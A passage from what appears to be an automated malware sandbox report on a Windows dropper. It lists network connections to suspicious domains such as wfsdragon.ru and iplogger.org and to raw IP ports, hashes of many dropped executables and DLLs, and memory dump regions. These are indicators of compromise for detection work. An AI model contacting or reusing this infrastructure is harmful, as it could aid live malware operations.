| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| N/A | 127.0.0.1:49293 | tcp | |
| N/A | 127.0.0.1:49295 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 2.21.137.121:80 | www.microsoft.com | tcp |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp |
Files
\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe
| MD5 | 9b2134ee1ae45204587c324a88830c08 |
| SHA1 | 4829c7a3ce45a7021d57c2da712949d7ea0f2bc6 |
| SHA256 | 3e0591618a8247d00aab0e95297f4250d140a312c52951d4163f5bc34d73af37 |
| SHA512 | 4055e2d5b5134079734b6c273292835ee557df6e4e1f26797084c7b737d99d7b6900b2f4e2563c5af8b051afffac9f2e18a60d57f11885444bf17f222170588d |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2136-56-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2136-60-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/2136-63-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2136-69-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2136-68-0x0000000064941000-0x000000006494F000-memory.dmp
memory/2136-70-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2136-73-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2136-72-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2136-71-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2136-79-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2136-78-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2136-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2136-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2136-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2136-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe
| MD5 | 455c155c134be5785122eb4dd9966b57 |
| SHA1 | 2e9685a7511f53f236869378055d321896827b49 |
| SHA256 | 314846b9ef02e6cfd78a230e3966cee0f6b746a54f05a845e5af2817396ff2f1 |
| SHA512 | 6a0620b30f6fa46ab26eaf06cee1a019d7bca836bc99f090de0c5df45ea6e84aa83070bc8f1f497ed074417702419c5aee00f6e0b40f777d6f6f8be3a69ce793 |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe
| MD5 | 619aa73b97d9d55df2ab142b8a7d9ae4 |
| SHA1 | 8e6aee5e473f278855887aeae38323e2bbb23b21 |
| SHA256 | 8164fcc1805d268c83bb84cfd42a21e9f85752c13c4d2033f191ed50fc8c47ed |
| SHA512 | ef488b50dc46e8f97701ae3530f0b8ba8dce60274b073b394e4c9344a63bfc852b2628b75b9267f747427ae3f8e52f1e38c00abe0b6bd700fd67eb8524cbaf58 |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu124078ed79bdbd5.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe
| MD5 | d75800977e3ec3199509eb2e0a6a28f5 |
| SHA1 | 3edc49c3a466f3bbc977c42406fbd5c90d49e462 |
| SHA256 | 90fc68c39590b8d6e7783e52e1660ff9ec68daee37940bf49399d95e6ad1fe7b |
| SHA512 | 5804a076e306d336f2897be6bb06e7cd80465977a8915ada3e9117128931611a13548b96086625cfc1e7477f067e68208bfceb5a5f38ce7e78716e20e81d4749 |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu123e05ebe43921.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1262fd911d3e6320.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu120bfbc2443b3b5d.exe
| MD5 | bdbbf4f034c9f43e4ab00002eb78b990 |
| SHA1 | 99c655c40434d634691ea1d189b5883f34890179 |
| SHA256 | 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae |
| SHA512 | dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12465fe68f85b6156.exe
| MD5 | 385ec35e040120516d0d8209c3058e6b |
| SHA1 | 15e04bcae85950c29ba2ae0311a3a444fa3954f5 |
| SHA256 | 4cda6584d780908c63ecd073f88160b7aa03cfbe240345e1e3d60b87bae21e36 |
| SHA512 | 211f04a84b08d1a696498a042fe1c61ccc212bfc4e88595a022145cfe8f228ed08d5d172b210854292dfec3cefb8efc6fcae62e4626a604209f0ea246cb28c7f |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12b275ee70c7e913.exe
| MD5 | 9074b165bc9d453e37516a2558af6c9b |
| SHA1 | 11db0a256a502aa87d5491438775922a34fb9aa8 |
| SHA256 | 3ffdaa1515622897c84111ab4180de09aadd03674935555270a2789625f7e513 |
| SHA512 | ee0b950587c5a16a3c255f4c6b333e65cc2ada8429efc27e02165f4b3402fbd257a67f5adb8a3ffc1c4a4c95ecf2582da5ffbcb64322107e0e664ac7c388b62b |
\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu122f7469b214cb59.exe
| MD5 | cd8b326d99a29d3c3586be7e51a33de9 |
| SHA1 | 5a50f0e17a398c6dc7c9c995826e7fe417762d07 |
| SHA256 | 0cd5a6958f291db7c078d25106a3265cce9aa53291c327ae1852a00b0d315049 |
| SHA512 | f5b75115291cf4fa15cb0a7a13a994bc18bd0195a2c088907fda270d6006f5e3bdf23aa482f0605cac381ceb15faab920daa0a143b5d448988b5055873d73c24 |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12ca1c119bc29.exe
| MD5 | 929f431a5093b6ba736d6d17216f237a |
| SHA1 | 19cd747e4aa9f185eca3656a4d3ef7d28a9a279f |
| SHA256 | 5650aab287506d1139b3a5511f012cc4fa2b152f49cb17fe653ddbc821fee8bc |
| SHA512 | 9c0ffde8b9cfe579584e03d21c11a6d60d03a18da75315c40a4370d05cefa9e728c84a0668b8d03e7fe7afb0020adcb84803f63b508a72df868605d89fc7e4e8 |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe
| MD5 | c1071152823c75363b1fc55759ef2b8a |
| SHA1 | 463ab5487ef7e9e170491dd79e8ab75b2f782ad6 |
| SHA256 | c9ce0e9a228fc8069fc40c7a1cbcf764a1755ac3c26e1ab50b623c55035287fd |
| SHA512 | f4e52c4191128a32ff7ea3b3c06df0d8b648c7ef7e1167ede966a0399401693d7b25ab57393e915b66ff16e5b9ce62e100045e66e0f364673e2a16025de15994 |
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe
| MD5 | a620135b51dda235d8cf29a7a0f24ef4 |
| SHA1 | 58eba3666c536215e3fc3660629dc63a999fe9e3 |
| SHA256 | 056091d19c1724c295197ccf6967d5b0cd98e87fa43dbbfd53de049526588b8d |
| SHA512 | fc6eac7f772dc14e96e421a16ab48092032baef5bd734e3ba58923a3b124ddcd7d39c5f3c0fd7056f4ef03b4f087244fce3e63788d3ddbfd7f166b2348fff0aa |
memory/2832-126-0x0000000000400000-0x0000000000414000-memory.dmp
memory/992-129-0x0000000000240000-0x000000000025C000-memory.dmp
memory/3060-131-0x0000000001250000-0x00000000012B6000-memory.dmp
memory/2988-130-0x0000000000390000-0x00000000003FA000-memory.dmp
memory/988-134-0x0000000000FF0000-0x0000000001060000-memory.dmp
memory/992-140-0x00000000008C0000-0x00000000008C6000-memory.dmp
memory/460-141-0x0000000000C20000-0x0000000000C28000-memory.dmp
memory/2136-142-0x0000000064940000-0x0000000064959000-memory.dmp
memory/1664-139-0x0000000000400000-0x0000000002F01000-memory.dmp
memory/2832-150-0x0000000000400000-0x0000000000414000-memory.dmp
memory/876-149-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1692-153-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-8FFJH.tmp\Thu125e541847539.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KVI8WOM8Z2NW81M0H5E0.temp
| MD5 | 56b2ae330cf3159e33f26ed9bfb26f5e |
| SHA1 | fe0bcf8e8afd1596c7a0881e97e5521615a3a679 |
| SHA256 | 1a4b7cc98b75ec3a757fd51e019319523961674f4bd4ff079c02181c070a26bd |
| SHA512 | 9ce981037211b7b4fed192dad9ffa7453d5501d12f124f4785a58febebfbbf54e6bad90a1865d44dc0f37fc31b8618677511f73cfe94dae0e68d221ade72d1e0 |
C:\Users\Admin\AppData\Local\Temp\is-TM4GU.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\Local\Temp\is-TM4GU.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/2136-178-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2136-177-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2136-176-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2136-175-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2136-173-0x0000000000400000-0x000000000051C000-memory.dmp
memory/372-204-0x00000000022B0000-0x0000000002445000-memory.dmp
memory/372-205-0x00000000027D0000-0x0000000002875000-memory.dmp
memory/372-209-0x0000000002880000-0x0000000002912000-memory.dmp
memory/372-206-0x0000000002880000-0x0000000002912000-memory.dmp
memory/1288-223-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1288-221-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2920-248-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2920-246-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2920-245-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2920-244-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2920-242-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2920-240-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2920-238-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2980-235-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2980-234-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2980-233-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2980-232-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2980-230-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2980-228-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2980-226-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2980-224-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1288-220-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1288-219-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1288-217-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1288-215-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1288-213-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1288-211-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2136-263-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2136-262-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2136-261-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2136-260-0x000000006B280000-0x000000006B2A6000-memory.dmp